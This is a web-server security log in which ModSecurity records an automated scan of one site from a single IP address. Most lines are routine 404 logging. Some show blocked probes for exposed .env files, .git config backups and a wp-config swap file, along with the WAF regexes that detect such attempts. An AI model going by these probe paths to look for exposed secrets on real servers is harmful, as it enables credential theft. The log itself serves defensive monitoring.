[Tue May 26 13:03:58.672902 2026] [security2:error] [pid 470766:tid 470945] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79HAAAADE"]
[Tue May 26 13:03:58.673597 2026] [security2:error] [pid 470766:tid 470982] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79HQAAAFY"]
[Tue May 26 13:03:58.681841 2026] [security2:error] [pid 470766:tid 470929] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79HgAAACE"]
[Tue May 26 13:03:58.699428 2026] [security2:error] [pid 470766:tid 470786] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.git/config.bak"] [unique_id "ahVM5ujO_W1DqEcFHQ79KAAAJRM"]
[Tue May 26 13:03:58.700849 2026] [security2:error] [pid 470766:tid 470896] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79IQAAAAA"]
[Tue May 26 13:03:58.709478 2026] [security2:error] [pid 470766:tid 470792] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.git/config.old"] [unique_id "ahVM5ujO_W1DqEcFHQ79KQAAJRk"]
[Tue May 26 13:03:58.742455 2026] [security2:error] [pid 470766:tid 470781] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.git/config~"] [unique_id "ahVM5ujO_W1DqEcFHQ79KgAAKw4"]
[Tue May 26 13:03:58.799497 2026] [security2:error] [pid 470766:tid 470995] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79NgAAAGM"]
[Tue May 26 13:03:58.800107 2026] [security2:error] [pid 470766:tid 470903] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79OAAAAAc"]
[Tue May 26 13:03:58.802653 2026] [security2:error] [pid 470766:tid 470984] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79PQAAAFg"]
[Tue May 26 13:03:58.803447 2026] [security2:error] [pid 470766:tid 470951] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79PwAAADc"]
[Tue May 26 13:03:58.806768 2026] [security2:error] [pid 470766:tid 470990] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79OQAAAF4"]
[Tue May 26 13:03:58.807588 2026] [security2:error] [pid 470766:tid 470949] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79PAAAADU"]
[Tue May 26 13:03:58.860272 2026] [security2:error] [pid 470766:tid 470917] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79TAAAABU"]
[Tue May 26 13:03:58.860723 2026] [security2:error] [pid 470766:tid 470940] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79SwAAACw"]
[Tue May 26 13:03:58.863537 2026] [security2:error] [pid 470766:tid 470980] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79UAAAAFQ"]
[Tue May 26 13:03:58.866522 2026] [security2:error] [pid 470766:tid 470927] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79TgAAAB8"]
[Tue May 26 13:03:58.869352 2026] [security2:error] [pid 470766:tid 470911] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79TQAAAA8"]
[Tue May 26 13:03:58.872524 2026] [security2:error] [pid 470766:tid 470978] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79UQAAAFI"]
[Tue May 26 13:03:58.899917 2026] [security2:error] [pid 470766:tid 470961] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79WAAAAEE"]
[Tue May 26 13:03:58.901913 2026] [security2:error] [pid 470766:tid 470942] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79VwAAAC4"]
[Tue May 26 13:03:58.907964 2026] [security2:error] [pid 470766:tid 471001] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79WgAAAGk"]
[Tue May 26 13:03:58.935996 2026] [security2:error] [pid 470766:tid 471007] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79XgAAAG8"]
[Tue May 26 13:03:59.014406 2026] [security2:error] [pid 470766:tid 471005] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79bQAAAG0"]
[Tue May 26 13:03:59.021749 2026] [security2:error] [pid 470766:tid 470929] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79awAAACE"]
[Tue May 26 13:03:59.028260 2026] [security2:error] [pid 470766:tid 470896] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79cAAAAAA"]
[Tue May 26 13:03:59.029160 2026] [security2:error] [pid 470766:tid 470963] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79bAAAAEM"]
[Tue May 26 13:03:59.056769 2026] [security2:error] [pid 470766:tid 470971] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79fAAAAEs"]
[Tue May 26 13:03:59.059976 2026] [security2:error] [pid 470766:tid 471023] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79fwAAAH8"]
[Tue May 26 13:03:59.060401 2026] [security2:error] [pid 470766:tid 470919] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79gAAAABc"]
[Tue May 26 13:03:59.060463 2026] [security2:error] [pid 470766:tid 470915] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79cwAAABM"]
[Tue May 26 13:03:59.064494 2026] [security2:error] [pid 470766:tid 471010] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79dAAAAHI"]
[Tue May 26 13:03:59.071745 2026] [security2:error] [pid 470766:tid 470957] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79fgAAAD0"]
[Tue May 26 13:03:59.075278 2026] [security2:error] [pid 470766:tid 470969] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79ggAAAEk"]
[Tue May 26 13:03:59.097410 2026] [security2:error] [pid 470766:tid 470943] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79hwAAAC8"]
[Tue May 26 13:03:59.105037 2026] [security2:error] [pid 470766:tid 470999] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79igAAAGc"]
[Tue May 26 13:03:59.109301 2026] [security2:error] [pid 470766:tid 470913] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79iwAAABE"]
[Tue May 26 13:03:59.124517 2026] [security2:error] [pid 470766:tid 470972] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79kQAAAEw"]
[Tue May 26 13:03:59.139415 2026] [security2:error] [pid 470766:tid 470914] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79kAAAABI"]
[Tue May 26 13:03:59.273317 2026] [security2:error] [pid 470766:tid 470920] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79oQAAABg"]
[Tue May 26 13:03:59.278971 2026] [autoindex:error] [pid 470766:tid 470945] [client 195.178.110.199:0] AH01276: Cannot serve directory /home1/vcress4h/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:03:59.293397 2026] [security2:error] [pid 470766:tid 470936] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79ogAAACg"]
[Tue May 26 13:03:59.293496 2026] [security2:error] [pid 470766:tid 470970] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79pAAAAEo"]
[Tue May 26 13:03:59.301637 2026] [security2:error] [pid 470766:tid 470958] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79rwAAAD4"]
[Tue May 26 13:03:59.306167 2026] [security2:error] [pid 470766:tid 470976] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79swAAUDQ"]
[Tue May 26 13:03:59.308358 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79sQAAAEA"]
[Tue May 26 13:03:59.312009 2026] [security2:error] [pid 470766:tid 470937] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79tgAAACk"]
[Tue May 26 13:03:59.312167 2026] [security2:error] [pid 470766:tid 470975] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79tAAAAE8"]
[Tue May 26 13:03:59.313558 2026] [security2:error] [pid 470766:tid 470961] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79owAAAEE"]
[Tue May 26 13:03:59.318812 2026] [security2:error] [pid 470766:tid 471001] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79sgAAAGk"]
[Tue May 26 13:03:59.336150 2026] [security2:error] [pid 470766:tid 471000] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79uAAAAGg"]
[Tue May 26 13:03:59.336170 2026] [security2:error] [pid 470766:tid 470955] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79wgAAADs"]
[Tue May 26 13:03:59.337847 2026] [security2:error] [pid 470766:tid 470933] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79xgAAACU"]
[Tue May 26 13:03:59.338187 2026] [security2:error] [pid 470766:tid 470973] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79vgAAAE0"]
[Tue May 26 13:03:59.346587 2026] [security2:error] [pid 470766:tid 470929] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ79ygAAACE"]
[Tue May 26 13:03:59.425663 2026] [security2:error] [pid 470766:tid 470807] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVM5-jO_W1DqEcFHQ790gAADCg"]
[Tue May 26 13:03:59.451152 2026] [security2:error] [pid 470766:tid 470891] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/ADMIN/.env"] [unique_id "ahVM5-jO_W1DqEcFHQ792wAADHw"]
[Tue May 26 13:03:59.463842 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ791QAAABQ"]
[Tue May 26 13:03:59.465498 2026] [security2:error] [pid 470766:tid 470767] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/API/.env"] [unique_id "ahVM5-jO_W1DqEcFHQ795AAADAA"]
[Tue May 26 13:03:59.487174 2026] [security2:error] [pid 470766:tid 470880] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/Api/.env"] [unique_id "ahVM5-jO_W1DqEcFHQ797AAADHE"]
[Tue May 26 13:03:59.487395 2026] [security2:error] [pid 470766:tid 470890] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/APP/.env"] [unique_id "ahVM5-jO_W1DqEcFHQ796gAADHs"]
[Tue May 26 13:03:59.493048 2026] [security2:error] [pid 470766:tid 470894] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/BACK/.env"] [unique_id "ahVM5-jO_W1DqEcFHQ797QAADH8"]
[Tue May 26 13:03:59.499569 2026] [security2:error] [pid 470766:tid 470969] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ794gAAAEk"]
[Tue May 26 13:03:59.513652 2026] [security2:error] [pid 470766:tid 470908] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ795QAADDg"]
[Tue May 26 13:03:59.513773 2026] [security2:error] [pid 470766:tid 470908] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ795wAADDo"]
[Tue May 26 13:03:59.519703 2026] [security2:error] [pid 470766:tid 470908] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ795gAADDk"]
[Tue May 26 13:03:59.520954 2026] [security2:error] [pid 470766:tid 470908] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5-jO_W1DqEcFHQ796QAADEk"]
